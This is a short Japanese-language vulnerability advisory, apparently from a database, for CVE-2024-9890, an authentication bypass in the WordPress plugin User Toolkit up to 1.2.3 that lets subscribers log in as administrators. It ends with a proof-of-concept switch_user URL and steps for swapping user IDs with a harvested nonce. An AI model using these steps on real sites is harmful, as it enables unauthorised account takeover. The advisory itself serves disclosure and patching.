
User Toolkit <= 1.2.3 - 認証済み(サブスクライバー以上)認証バイパス
User Toolkit <= 1.2.3 - 認証済み(Subscriber以上)認証バイパス
WordPress用プラグイン User Toolkit は、バージョン 1.2.3 以前において、認証バイパスの脆弱性が存在します。これは 'switchUser' 関数における不適切な権限チェックに起因します。このため、Subscriber 以上の権限を持つ認証済み攻撃者が、管理者などの既存ユーザーとしてログインできる可能性があります。
Published: 2024-10-25 00:00:00
CVE: CVE-2024-9890
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: user-toolkit
http://kubernetes.docker.internal/wp-login.php?action=switch_user&user_id=4&user_from=1&_wpnonce=8af7611329
自分のユーザーとしてログインします。 プロフィールページのソースを表示して nonce 値を取得します。 user_from の値を自分のユーザー ID に変更します。 user_id を管理者の ID に変更します。 完了!